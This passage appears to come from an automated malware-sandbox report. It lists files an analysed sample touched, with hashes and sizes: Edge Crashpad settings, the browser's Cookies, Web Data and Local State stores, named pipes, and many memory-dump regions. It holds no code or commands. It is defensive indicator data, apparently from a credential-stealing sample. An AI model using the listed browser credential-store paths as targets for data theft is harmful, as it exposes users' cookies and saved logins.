SHA512
5c9aedc1be72562445db07fc367afcf3dd003ee2f874dea33ff36d801e86c18559cc44f538ebaa7397fe387a494737a147b260b08a6bca6bfacaf332485a4cf5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
0e45a3d6c31013da55ed308015a7b40c

SHA1
bfc912c204506a5ad8cf07c374577316341990c6

SHA256
f9a349c81c351f483f1db40cccb7a4a99950fc30769ab9be716739f1beaf413c

SHA512
5c9aedc1be72562445db07fc367afcf3dd003ee2f874dea33ff36d801e86c18559cc44f538ebaa7397fe387a494737a147b260b08a6bca6bfacaf332485a4cf5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
44a0e0dec73bba7d7c456b24a4c3884e

SHA1
bcaf39464270fb6b4d88e456b7c146ef44885a00

SHA256
41a197f731931bf11cdf1d6c8dc9fc1ef9f8095700499044563d838269cafd52

SHA512
11640e42884a131d18ea86c005a3d10c553978bcaf3ec4d727e22c686141b6afa5d92e5e7ae0a88e1cf5ae2503eb731471e4847f87339d6aecd58c58b10b338f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
44a0e0dec73bba7d7c456b24a4c3884e

SHA1
bcaf39464270fb6b4d88e456b7c146ef44885a00

SHA256
41a197f731931bf11cdf1d6c8dc9fc1ef9f8095700499044563d838269cafd52

SHA512
11640e42884a131d18ea86c005a3d10c553978bcaf3ec4d727e22c686141b6afa5d92e5e7ae0a88e1cf5ae2503eb731471e4847f87339d6aecd58c58b10b338f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
44a0e0dec73bba7d7c456b24a4c3884e

SHA1
bcaf39464270fb6b4d88e456b7c146ef44885a00

SHA256
41a197f731931bf11cdf1d6c8dc9fc1ef9f8095700499044563d838269cafd52

SHA512
11640e42884a131d18ea86c005a3d10c553978bcaf3ec4d727e22c686141b6afa5d92e5e7ae0a88e1cf5ae2503eb731471e4847f87339d6aecd58c58b10b338f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
44a0e0dec73bba7d7c456b24a4c3884e

SHA1
bcaf39464270fb6b4d88e456b7c146ef44885a00

SHA256
41a197f731931bf11cdf1d6c8dc9fc1ef9f8095700499044563d838269cafd52

SHA512
11640e42884a131d18ea86c005a3d10c553978bcaf3ec4d727e22c686141b6afa5d92e5e7ae0a88e1cf5ae2503eb731471e4847f87339d6aecd58c58b10b338f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
44a0e0dec73bba7d7c456b24a4c3884e

SHA1
bcaf39464270fb6b4d88e456b7c146ef44885a00

SHA256
41a197f731931bf11cdf1d6c8dc9fc1ef9f8095700499044563d838269cafd52

SHA512
11640e42884a131d18ea86c005a3d10c553978bcaf3ec4d727e22c686141b6afa5d92e5e7ae0a88e1cf5ae2503eb731471e4847f87339d6aecd58c58b10b338f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
44a0e0dec73bba7d7c456b24a4c3884e

SHA1
bcaf39464270fb6b4d88e456b7c146ef44885a00

SHA256
41a197f731931bf11cdf1d6c8dc9fc1ef9f8095700499044563d838269cafd52

SHA512
11640e42884a131d18ea86c005a3d10c553978bcaf3ec4d727e22c686141b6afa5d92e5e7ae0a88e1cf5ae2503eb731471e4847f87339d6aecd58c58b10b338f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
44a0e0dec73bba7d7c456b24a4c3884e

SHA1
bcaf39464270fb6b4d88e456b7c146ef44885a00

SHA256
41a197f731931bf11cdf1d6c8dc9fc1ef9f8095700499044563d838269cafd52

SHA512
11640e42884a131d18ea86c005a3d10c553978bcaf3ec4d727e22c686141b6afa5d92e5e7ae0a88e1cf5ae2503eb731471e4847f87339d6aecd58c58b10b338f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
44a0e0dec73bba7d7c456b24a4c3884e

SHA1
bcaf39464270fb6b4d88e456b7c146ef44885a00

SHA256
41a197f731931bf11cdf1d6c8dc9fc1ef9f8095700499044563d838269cafd52

SHA512
11640e42884a131d18ea86c005a3d10c553978bcaf3ec4d727e22c686141b6afa5d92e5e7ae0a88e1cf5ae2503eb731471e4847f87339d6aecd58c58b10b338f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
44a0e0dec73bba7d7c456b24a4c3884e

SHA1
bcaf39464270fb6b4d88e456b7c146ef44885a00

SHA256
41a197f731931bf11cdf1d6c8dc9fc1ef9f8095700499044563d838269cafd52

SHA512
11640e42884a131d18ea86c005a3d10c553978bcaf3ec4d727e22c686141b6afa5d92e5e7ae0a88e1cf5ae2503eb731471e4847f87339d6aecd58c58b10b338f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
44a0e0dec73bba7d7c456b24a4c3884e

SHA1
bcaf39464270fb6b4d88e456b7c146ef44885a00

SHA256
41a197f731931bf11cdf1d6c8dc9fc1ef9f8095700499044563d838269cafd52

SHA512
11640e42884a131d18ea86c005a3d10c553978bcaf3ec4d727e22c686141b6afa5d92e5e7ae0a88e1cf5ae2503eb731471e4847f87339d6aecd58c58b10b338f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
44a0e0dec73bba7d7c456b24a4c3884e

SHA1
bcaf39464270fb6b4d88e456b7c146ef44885a00

SHA256
41a197f731931bf11cdf1d6c8dc9fc1ef9f8095700499044563d838269cafd52

SHA512
11640e42884a131d18ea86c005a3d10c553978bcaf3ec4d727e22c686141b6afa5d92e5e7ae0a88e1cf5ae2503eb731471e4847f87339d6aecd58c58b10b338f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
44a0e0dec73bba7d7c456b24a4c3884e

SHA1
bcaf39464270fb6b4d88e456b7c146ef44885a00

SHA256
41a197f731931bf11cdf1d6c8dc9fc1ef9f8095700499044563d838269cafd52

SHA512
11640e42884a131d18ea86c005a3d10c553978bcaf3ec4d727e22c686141b6afa5d92e5e7ae0a88e1cf5ae2503eb731471e4847f87339d6aecd58c58b10b338f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies
Filesize
20KB

MD5
49693267e0adbcd119f9f5e02adf3a80

SHA1
3ba3d7f89b8ad195ca82c92737e960e1f2b349df

SHA256
d76e7512e496b7c8d9fcd3010a55e2e566881dc6dacaf0343652a4915d47829f

SHA512
b4b9fcecf8d277bb0ccbb25e08f3559e3fc519d85d8761d8ad5bca983d04eb55a20d3b742b15b9b31a7c9187da40ad5c48baa7a54664cae4c40aa253165cbaa2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Web Data
Filesize
112KB

MD5
30e375798049100677ea16b7c578a4ee

SHA1
bcab7401a5f34ac0e6f795ece8d3ed12944ae99f

SHA256
ea5c90cfc97f429a2f9e0b1e9b16778b5b19bd8e83a896a30002de70af84e1ce

SHA512
f8ae930e26ecfe06dc30d4f39858b0eec6b4a81a8139883712505b5c6b58504d463d986ef58c7151a247fe157c6013b570b9d39e1d4a860061e37e0419900582

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
2KB

MD5
f2c93891bc3a3651af51f0dacf7f72ca

SHA1
68e5c28ea5de2c20aff04fe83537640cef2903dc

SHA256
0a9d77b5e48be5965d2dba29b65e9908f36841190217baaa2e7e3f44c80b2b27

SHA512
8d38b68135b92b0e7dd66842429ddfdf7695b83c28ea5edc48219d618dc467179f3868b2677ee32f795445007331313bddbcdc1286dab1c41850fd24aa4161b3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
2KB

MD5
25650c4512e90c3fa7404e1a4cf36c1a

SHA1
7f2aeeb38367a53058d97bf95f2cd91650b00920

SHA256
4f2773ee3ae8e9485870890210268fbf71988a131efd77252a1e1c2df87a5947

SHA512
a215ed08d3ab3d4e5e3e292bd9d19310c5e53b58e2cd18fab80f5374d91e09d41f6c5c464053e8c3cf58c2e9674ba03351fd2e55c40a62c30ed86af7a0f4658a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
2KB

MD5
94411b6f9510af3bd054578be4f8bbe9

SHA1
c2254c3756b2712f5f1d3e9f1fa70e654955b9d3

SHA256
d700fe37fa04e2f8d3a82d83f859c9c028a418fec98a31a10da5492fafb5fbb4

SHA512
0d002fe2bb8e045f3cf3baf4e7a6206bc546de907314f55d67c58743604afa86fbfe03f9c17bd68efb40d5d54036ad04c2621c86cbbf245c879e5413700ac18d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
2KB

MD5
0fa6bb193e883f8de0b111f5c7f9ed2c

SHA1
7fd2d018506cfba5f518cf351a8ec36c30c2cf0a

SHA256
3b74a1daf15edcc067559b29abd599ca2be2fa05dc163de71f033ae5bf7e646b

SHA512
0e162ee03be09775f482cbeeac8d371ee09c75ff943cf7caac8fe3883a3a5d07f9bfe8a78035bc0b4fa17bc8470536014ac88927ce0f17c454a2dcc801646894

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
2KB

MD5
335c4cbfb8bae212e6eb8e78d1aa5ec1

SHA1
d3d28bba56ca0ae6893d07f83b7a30f21e983ee8

SHA256
12b1e29fd7e39e19842c8a048bd8fe28dbc795981347fe69063b6cd599e4d82c

SHA512
6ce0ef9e2b3bb3c41ac28dda787825ec1905bdaebf87d4f6e09400bb6866b6f2b53b2f89a3ec7dd10c40151a57c87e01f71a2eecac9006598f80332226fb9982

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
2KB

MD5
de09149f8a88ba2c07488ffc4e5022eb

SHA1
b2fa923d6a218fd59c75f5cb9716e43c4d778f94

SHA256
c96bf3e24f04cb91329577a00c85e17497072b99224ad85fe54fd1270fec34fc

SHA512
c09cc4f1c881a9f25597136d16fe87af2baae9bf03470387412d7e16d288e749e754785838c80e7270fb77dc3af71eac136e16b79d90df59ee4d0541527b3aef

Download Submit
\??\pipe\LOCAL\crashpad_1160_QOHWKUMQMQXHYFTP
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\pipe\LOCAL\crashpad_1444_MTXKBQXLNDIXKQRL
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\pipe\LOCAL\crashpad_2992_PEEIHITWXWIFWMSD
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\pipe\LOCAL\crashpad_3276_TNBQXNBTMLNBYIHZ
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\pipe\LOCAL\crashpad_3464_LCJVPRWDCAAPFZKI
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\pipe\LOCAL\crashpad_4548_OFKJEYMGRRFARCCQ
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\pipe\LOCAL\crashpad_4896_UONPPIUSXYBZMFJK
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/376-192-0x00000000022D0000-0x00000000022E2000-memory.dmp

Filesize
72KB

Download
memory/376-193-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/376-158-0x0000000000000000-mapping.dmp

Download
memory/488-144-0x0000000000000000-mapping.dmp

Download
memory/768-143-0x0000000000000000-mapping.dmp

Download
memory/1136-182-0x0000000000000000-mapping.dmp

Download
memory/1160-139-0x0000000000000000-mapping.dmp

Download
memory/1444-138-0x0000000000000000-mapping.dmp

Download
memory/1468-215-0x0000000000000000-mapping.dmp

Download
memory/1948-141-0x0000000000000000-mapping.dmp

Download
memory/2856-309-0x0000000000000000-mapping.dmp

Download
memory/2992-140-0x0000000000000000-mapping.dmp

Download
memory/3032-311-0x0000000000000000-mapping.dmp

Download
memory/3152-164-0x0000000000000000-mapping.dmp

Download
memory/3152-244-0x0000000060900000-0x0000000060992000-memory.dmp

Filesize
584KB

Download
memory/3156-173-0x0000000000000000-mapping.dmp

Download
memory/3156-206-0x0000000000180000-0x00000000001A0000-memory.dmp

Filesize
128KB

Download
memory/3276-147-0x0000000000000000-mapping.dmp

Download
memory/3464-136-0x0000000000000000-mapping.dmp

Download
memory/3516-200-0x0000000000540000-0x0000000000560000-memory.dmp

Filesize
128KB

Download
memory/3516-298-0x00000000056A0000-0x0000000005706000-memory.dmp

Filesize
408KB

Download
memory/3516-161-0x0000000000000000-mapping.dmp

Download
memory/3596-312-0x0000000000000000-mapping.dmp

Download
memory/4212-148-0x0000000000000000-mapping.dmp

Download
memory/4232-146-0x0000000000000000-mapping.dmp

Download
memory/4240-295-0x00000000068B0000-0x0000000006E54000-memory.dmp

Filesize
5.6MB

Download
memory/4240-176-0x0000000000000000-mapping.dmp

Download
memory/4240-271-0x0000000005740000-0x0000000005752000-memory.dmp

Filesize
72KB

Download
memory/4240-274-0x0000000005870000-0x000000000597A000-memory.dmp

Filesize
1.0MB

Download
memory/4240-296-0x0000000005C40000-0x0000000005CD2000-memory.dmp

Filesize
584KB

Download
memory/4240-297-0x0000000006300000-0x0000000006376000-memory.dmp

Filesize
472KB

Download
memory/4240-301-0x0000000007430000-0x00000000075F2000-memory.dmp

Filesize
1.8MB

Download
memory/4240-302-0x0000000007B30000-0x000000000805C000-memory.dmp

Filesize
5.2MB

Download
memory/4240-205-0x0000000000EF0000-0x0000000000F10000-memory.dmp

Filesize
128KB

Download
memory/4240-280-0x00000000057A0000-0x00000000057DC000-memory.dmp

Filesize
240KB

Download
memory/4320-307-0x0000000000000000-mapping.dmp

Download
memory/4492-217-0x0000000000000000-mapping.dmp

Download
memory/4520-145-0x0000000000000000-mapping.dmp

Download
memory/4524-178-0x00000000004E0000-0x00000000004F0000-memory.dmp

Filesize
64KB

Download
memory/4524-181-0x0000000000400000-0x000000000046E000-memory.dmp

Filesize
440KB

Download
memory/4524-177-0x000000000064D000-0x000000000065D000-memory.dmp

Filesize
64KB

Download
memory/4524-155-0x0000000000000000-mapping.dmp

Download
memory/4524-287-0x000000000064D000-0x000000000065D000-memory.dmp

Filesize
64KB

Download
memory/4524-288-0x0000000000400000-0x000000000046E000-memory.dmp

Filesize
440KB

Download
memory/4544-142-0x0000000000000000-mapping.dmp

Download
memory/4548-135-0x0000000000000000-mapping.dmp

Download
memory/4896-137-0x0000000000000000-mapping.dmp

Download
memory/4920-218-0x0000000000000000-mapping.dmp

Download
memory/4980-207-0x00000000006D0000-0x0000000000714000-memory.dmp

Filesize
272KB

Download
memory/4980-269-0x0000000005680000-0x0000000005C98000-memory.dmp

Filesize
6.1MB

Download
memory/4980-170-0x0000000000000000-mapping.dmp

Download
memory/4980-299-0x0000000005650000-0x000000000566E000-memory.dmp

Filesize
120KB

Download
memory/4980-300-0x00000000065D0000-0x0000000006620000-memory.dmp

Filesize
320KB

Download
memory/5052-167-0x0000000000000000-mapping.dmp

Download
memory/5124-219-0x0000000000000000-mapping.dmp

Download
memory/5132-220-0x0000000000000000-mapping.dmp

Download
memory/5152-221-0x0000000000000000-mapping.dmp

Download
memory/5184-223-0x0000000000000000-mapping.dmp

Download
memory/5188-304-0x0000000000000000-mapping.dmp

Download
memory/5236-253-0x0000000000000000-mapping.dmp

Download
memory/5240-222-0x0000000000000000-mapping.dmp

Download
memory/5260-224-0x0000000000000000-mapping.dmp

Download
memory/5272-225-0x0000000000000000-mapping.dmp

Download
memory/5284-226-0x0000000000000000-mapping.dmp

Download
memory/5296-227-0x0000000000000000-mapping.dmp

Download
memory/5316-228-0x0000000000000000-mapping.dmp

Download
memory/5328-232-0x0000000000000000-mapping.dmp

Download
memory/5344-234-0x0000000000000000-mapping.dmp

Download
memory/5756-303-0x0000000000000000-mapping.dmp

Download
memory/5776-305-0x0000000000000000-mapping.dmp

Download
memory/5900-294-0x0000000000000000-mapping.dmp

Download
memory/6172-258-0x0000000000000000-mapping.dmp

Download
memory/6408-290-0x0000000000000000-mapping.dmp

Download
memory/6412-267-0x0000000000000000-mapping.dmp

Download
memory/6532-273-0x0000000000000000-mapping.dmp

Download
memory/6628-279-0x0000000000000000-mapping.dmp

Download
memory/6676-292-0x0000000000000000-mapping.dmp

Download
memory/6688-282-0x0000000000000000-mapping.dmp

Download
memory/6772-284-0x0000000000000000-mapping.dmp

Download
memory/6912-286-0x0000000000000000-mapping.dmp

Download